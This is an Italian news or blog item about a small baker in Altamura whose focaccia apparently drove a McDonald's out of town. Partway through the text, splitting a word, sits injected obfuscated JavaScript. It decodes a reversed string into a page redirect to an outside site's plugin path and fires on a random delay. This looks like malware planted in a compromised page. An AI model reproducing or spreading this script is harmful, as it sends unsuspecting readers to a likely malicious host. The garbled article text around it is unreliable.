Focaccia – hamburger 1-0

image_pdfimage_print

Il ristorante di McDonald’s di Altamura in Puglia, è stato costretto a chiudere i battenti per la concorrenza di un piccolo panettiere pugliese. Il fatto è stato ripreso e commentato in prima pagina dal quotidiano francese “Liberation”: McDonald’s era sbarcato ad Altamura, paese di 65mila abitanti, nel 2001. Nella stessa piazza, qualche tempo fa, ha aperto bottega il giovane panettiere Luca Digesù, che ha subito allineato i prezzi dei suoi prodotti a quelli applicati dal gigante degli hamburger, moltiplic (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando la composizione delle focaccine e insistendo sulla qualità e la diversità del prodotto. Nel giro di qualche settimana la panetteria ruba così tanti clienti al gigante dei fast food da fargli moltiplicare le promozioni e le feste per bambini per riprenderseli. Il ristorante cambia pure direttore, ma non c’è niente da fare: Mc Donald’s è costretta ad andarsene battuta dai prodotti di un piccolo fornaio.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *